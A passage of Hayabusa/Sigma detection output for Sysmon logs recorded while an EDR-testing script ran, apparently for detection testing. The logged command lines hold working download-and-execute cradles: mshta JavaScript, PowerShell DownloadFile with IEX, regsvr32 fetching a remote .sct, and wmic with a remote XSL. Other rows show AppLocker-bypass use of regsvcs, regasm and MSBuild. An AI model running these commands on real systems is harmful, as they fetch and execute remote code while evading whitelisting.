: User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\mshta.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace show status : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c 